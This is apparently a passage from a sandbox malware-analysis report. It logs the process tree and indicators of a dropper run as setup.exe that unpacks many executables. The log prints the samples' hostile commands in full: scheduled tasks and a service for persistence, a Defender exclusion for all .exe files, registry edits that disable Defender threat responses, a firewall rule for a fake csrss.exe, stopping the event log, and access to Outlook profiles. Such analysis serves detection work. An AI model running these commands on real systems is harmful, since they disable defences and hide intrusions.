PID 4012 wrote to memory of 3768	4012	setup.exe	yktP61LlzfNSWIswKblrqQU3.exe
PID 4908 wrote to memory of 4936	4908	Om_xfa1yuts1xcKD3lpn5M6Q.exe	WMIC.exe
PID 4908 wrote to memory of 4936	4908	Om_xfa1yuts1xcKD3lpn5M6Q.exe	WMIC.exe
PID 4908 wrote to memory of 4936	4908	Om_xfa1yuts1xcKD3lpn5M6Q.exe	WMIC.exe
PID 784 wrote to memory of 3604	784	8jzwXwHBadrpxKuTwM0wwx6Q.exe	RegAsm.exe
PID 784 wrote to memory of 3604	784	8jzwXwHBadrpxKuTwM0wwx6Q.exe	RegAsm.exe
PID 784 wrote to memory of 3604	784	8jzwXwHBadrpxKuTwM0wwx6Q.exe	RegAsm.exe
PID 4052 wrote to memory of 888	4052	tFclRPvT6ogIJ0EjcHY3SLlV.exe	RegAsm.exe
PID 4052 wrote to memory of 888	4052	tFclRPvT6ogIJ0EjcHY3SLlV.exe	RegAsm.exe
PID 4052 wrote to memory of 888	4052	tFclRPvT6ogIJ0EjcHY3SLlV.exe	RegAsm.exe
PID 4908 wrote to memory of 832	4908	Om_xfa1yuts1xcKD3lpn5M6Q.exe	RegAsm.exe
PID 4908 wrote to memory of 832	4908	Om_xfa1yuts1xcKD3lpn5M6Q.exe	RegAsm.exe
PID 4908 wrote to memory of 832	4908	Om_xfa1yuts1xcKD3lpn5M6Q.exe	RegAsm.exe
PID 784 wrote to memory of 1628	784	8jzwXwHBadrpxKuTwM0wwx6Q.exe	RegAsm.exe
PID 784 wrote to memory of 1628	784	8jzwXwHBadrpxKuTwM0wwx6Q.exe	RegAsm.exe
PID 784 wrote to memory of 1628	784	8jzwXwHBadrpxKuTwM0wwx6Q.exe	RegAsm.exe
PID 4600 wrote to memory of 5072	4600	t8D1ffG_kYtcHvSLuguXApft.exe	is-5S4QA.tmp
PID 4600 wrote to memory of 5072	4600	t8D1ffG_kYtcHvSLuguXApft.exe	is-5S4QA.tmp
PID 4600 wrote to memory of 5072	4600	t8D1ffG_kYtcHvSLuguXApft.exe	is-5S4QA.tmp
PID 784 wrote to memory of 1628	784	8jzwXwHBadrpxKuTwM0wwx6Q.exe	RegAsm.exe
PID 784 wrote to memory of 1628	784	8jzwXwHBadrpxKuTwM0wwx6Q.exe	RegAsm.exe

outlook_office_path 1 IoCs

Processes:

LLHulNcUZD0RHSrXHw028qEL.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	LLHulNcUZD0RHSrXHw028qEL.exe

outlook_win_path 1 IoCs

Processes:

LLHulNcUZD0RHSrXHw028qEL.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	LLHulNcUZD0RHSrXHw028qEL.exe

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
1⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:4012

C:\Users\Admin\Documents\SimpleAdobe\uDf5aAoFw9G2zjOHLeKGRIDF.exe
C:\Users\Admin\Documents\SimpleAdobe\uDf5aAoFw9G2zjOHLeKGRIDF.exe
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3188

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:5884

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:5680

C:\Users\Admin\AppData\Local\Temp\heidi_cFlw2PbcT9n\WTSyDgDQx6MFPONdGaD6.exe
"C:\Users\Admin\AppData\Local\Temp\heidi_cFlw2PbcT9n\WTSyDgDQx6MFPONdGaD6.exe"
3⤵
PID:4300

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_5fc4ccc1a69cead8abaf9c75121d8fec\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_5fc4ccc1a69cead8abaf9c75121d8fec HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:1868

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_5fc4ccc1a69cead8abaf9c75121d8fec\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_5fc4ccc1a69cead8abaf9c75121d8fec LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:4416

C:\Users\Admin\AppData\Local\Temp\heidi_cFlw2PbcT9n\JqFmZXumC69wQb_RxDHK.exe
"C:\Users\Admin\AppData\Local\Temp\heidi_cFlw2PbcT9n\JqFmZXumC69wQb_RxDHK.exe"
3⤵
PID:5216

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:4732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3188 -s 2248
3⤵
- Program crash
PID:6032

C:\Users\Admin\Documents\SimpleAdobe\Wv3mdsLaSz1MXwzKqP4CIyz4.exe
C:\Users\Admin\Documents\SimpleAdobe\Wv3mdsLaSz1MXwzKqP4CIyz4.exe
2⤵
- Executes dropped EXE
PID:4680

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
3⤵
PID:6056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4680 -s 1032
3⤵
- Program crash
PID:6128

C:\Users\Admin\Documents\SimpleAdobe\nzeUPYfksH2Je_cvKrZSZ8yt.exe
C:\Users\Admin\Documents\SimpleAdobe\nzeUPYfksH2Je_cvKrZSZ8yt.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:204

C:\Users\Admin\Documents\SimpleAdobe\LLHulNcUZD0RHSrXHw028qEL.exe
C:\Users\Admin\Documents\SimpleAdobe\LLHulNcUZD0RHSrXHw028qEL.exe
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
PID:4352

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:4532

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:784

C:\Users\Admin\AppData\Local\Temp\heidi_cFlw2PbcT9n\WTSyDgDQx6MFPONdGaD6.exe
"C:\Users\Admin\AppData\Local\Temp\heidi_cFlw2PbcT9n\WTSyDgDQx6MFPONdGaD6.exe"
3⤵
PID:5420

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:5492

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:5504

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:5516

C:\Users\Admin\Documents\SimpleAdobe\tFclRPvT6ogIJ0EjcHY3SLlV.exe
C:\Users\Admin\Documents\SimpleAdobe\tFclRPvT6ogIJ0EjcHY3SLlV.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4052

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Modifies system certificate store
PID:888

C:\Users\Admin\Documents\SimpleAdobe\ZGs175WWCG9TzUwjejtUIUyE.exe
C:\Users\Admin\Documents\SimpleAdobe\ZGs175WWCG9TzUwjejtUIUyE.exe
2⤵
- Executes dropped EXE
PID:2768

C:\Users\Admin\Documents\SimpleAdobe\BhqyLQYwokC1WRzvX7kf3h1J.exe
C:\Users\Admin\Documents\SimpleAdobe\BhqyLQYwokC1WRzvX7kf3h1J.exe
2⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1952

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
3⤵
PID:4140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ff889279758,0x7ff889279768,0x7ff889279778
4⤵
PID:3384

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1596 --field-trial-handle=2156,i,7797311763852799386,7201306656739659207,131072 /prefetch:2
4⤵
PID:1108

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1768 --field-trial-handle=2156,i,7797311763852799386,7201306656739659207,131072 /prefetch:8
4⤵
PID:5096

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1820 --field-trial-handle=2156,i,7797311763852799386,7201306656739659207,131072 /prefetch:8
4⤵
PID:4176

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2988 --field-trial-handle=2156,i,7797311763852799386,7201306656739659207,131072 /prefetch:1
4⤵
PID:3128

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3012 --field-trial-handle=2156,i,7797311763852799386,7201306656739659207,131072 /prefetch:1
4⤵
PID:4632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3780 --field-trial-handle=2156,i,7797311763852799386,7201306656739659207,131072 /prefetch:1
4⤵
PID:1876

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4104 --field-trial-handle=2156,i,7797311763852799386,7201306656739659207,131072 /prefetch:1
4⤵
PID:5284

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4932 --field-trial-handle=2156,i,7797311763852799386,7201306656739659207,131072 /prefetch:8
4⤵
PID:5696

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4960 --field-trial-handle=2156,i,7797311763852799386,7201306656739659207,131072 /prefetch:8
4⤵
PID:5704

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5232 --field-trial-handle=2156,i,7797311763852799386,7201306656739659207,131072 /prefetch:8
4⤵
PID:5752

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5264 --field-trial-handle=2156,i,7797311763852799386,7201306656739659207,131072 /prefetch:8
4⤵
PID:5760

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4928 --field-trial-handle=2156,i,7797311763852799386,7201306656739659207,131072 /prefetch:8
4⤵
PID:5872

C:\Users\Admin\Documents\SimpleAdobe\8jzwXwHBadrpxKuTwM0wwx6Q.exe
C:\Users\Admin\Documents\SimpleAdobe\8jzwXwHBadrpxKuTwM0wwx6Q.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:784

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:3604

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:1628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 2012
4⤵
- Program crash
PID:6012

C:\Users\Admin\Documents\SimpleAdobe\F4PsO_85eZwIxbaB0mc_D5Tb.exe
C:\Users\Admin\Documents\SimpleAdobe\F4PsO_85eZwIxbaB0mc_D5Tb.exe
2⤵
- Executes dropped EXE
PID:4876

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
3⤵
PID:2528

C:\Users\Admin\Documents\SimpleAdobe\F4PsO_85eZwIxbaB0mc_D5Tb.exe
"C:\Users\Admin\Documents\SimpleAdobe\F4PsO_85eZwIxbaB0mc_D5Tb.exe"
3⤵
PID:5388

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:6028

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
PID:1308

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
- Modifies Windows Firewall
PID:1304

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:5456

C:\Users\Admin\Documents\SimpleAdobe\COFvVQmEFf9dLjropW5k7lbG.exe
C:\Users\Admin\Documents\SimpleAdobe\COFvVQmEFf9dLjropW5k7lbG.exe
2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5052

C:\Users\Admin\Documents\SimpleAdobe\SRcOOb9EdAEkLEwXcm6hKuw4.exe
C:\Users\Admin\Documents\SimpleAdobe\SRcOOb9EdAEkLEwXcm6hKuw4.exe
2⤵
- Executes dropped EXE
PID:3576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 768
3⤵
- Program crash
PID:1996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 824
3⤵
- Program crash
PID:4380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 848
3⤵
- Program crash
PID:2372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 860
3⤵
- Program crash
PID:2064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 852
3⤵
- Program crash
PID:4776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 1092
3⤵
- Program crash
PID:1640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 1132
3⤵
- Program crash
PID:360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 1272
3⤵
- Program crash
PID:4288

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "SRcOOb9EdAEkLEwXcm6hKuw4.exe" /f & erase "C:\Users\Admin\Documents\SimpleAdobe\SRcOOb9EdAEkLEwXcm6hKuw4.exe" & exit
3⤵
PID:4988

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "SRcOOb9EdAEkLEwXcm6hKuw4.exe" /f
4⤵
- Kills process with taskkill
PID:3388

C:\Users\Admin\Documents\SimpleAdobe\OpZbT4g9pLRxOtK2TUsJia5y.exe
C:\Users\Admin\Documents\SimpleAdobe\OpZbT4g9pLRxOtK2TUsJia5y.exe
2⤵
- Executes dropped EXE
PID:2736

C:\Users\Admin\AppData\Local\Temp\7zS11CE.tmp\Install.exe
.\Install.exe /wuNdidRg "525403" /S
3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:4172

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
4⤵
PID:392

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
5⤵
PID:2596

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:928

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
PID:4936

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bXvtwaJkKQEzfXjvnG" /SC once /ST 19:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa\EDHrMUSPJvyJNvL\mYITlgS.exe\" Mv /tUsite_idRas 525403 /S" /V1 /F
4⤵
- Creates scheduled task(s)
PID:1976

C:\Users\Admin\Documents\SimpleAdobe\t8D1ffG_kYtcHvSLuguXApft.exe
C:\Users\Admin\Documents\SimpleAdobe\t8D1ffG_kYtcHvSLuguXApft.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4600

C:\Users\Admin\AppData\Local\Temp\is-04E62.tmp\is-5S4QA.tmp
"C:\Users\Admin\AppData\Local\Temp\is-04E62.tmp\is-5S4QA.tmp" /SL4 $80286 "C:\Users\Admin\Documents\SimpleAdobe\t8D1ffG_kYtcHvSLuguXApft.exe" 4144871 52224
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5072

C:\Users\Admin\AppData\Local\Three Kingsoft Video\threekingsoftvideo.exe
"C:\Users\Admin\AppData\Local\Three Kingsoft Video\threekingsoftvideo.exe" -i
4⤵
- Executes dropped EXE
PID:1700

C:\Users\Admin\AppData\Local\Three Kingsoft Video\threekingsoftvideo.exe
"C:\Users\Admin\AppData\Local\Three Kingsoft Video\threekingsoftvideo.exe" -s
4⤵
- Executes dropped EXE
PID:3636

C:\Users\Admin\Documents\SimpleAdobe\Om_xfa1yuts1xcKD3lpn5M6Q.exe
C:\Users\Admin\Documents\SimpleAdobe\Om_xfa1yuts1xcKD3lpn5M6Q.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4908

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4936

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 2220
4⤵
- Program crash
PID:2456

C:\Users\Admin\Documents\SimpleAdobe\yktP61LlzfNSWIswKblrqQU3.exe
C:\Users\Admin\Documents\SimpleAdobe\yktP61LlzfNSWIswKblrqQU3.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3768

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
3⤵
PID:3040

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
3⤵
PID:5096

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
3⤵
PID:4036

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
3⤵
PID:4024

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "OBGPQMHF"
3⤵
- Launches sc.exe
PID:4732

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"
3⤵
- Launches sc.exe
PID:648

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:4184

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "OBGPQMHF"
3⤵
- Launches sc.exe
PID:4604

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:4344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4388

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1960

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:860

C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
1⤵
PID:2064

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
PID:3576

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
PID:5096

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
PID:3824

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
PID:4088

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:3332

C:\Windows\system32\svchost.exe
svchost.exe
2⤵
PID:3768

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:5896

C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa\EDHrMUSPJvyJNvL\mYITlgS.exe
C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa\EDHrMUSPJvyJNvL\mYITlgS.exe Mv /tUsite_idRas 525403 /S
1⤵
PID:5536

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t 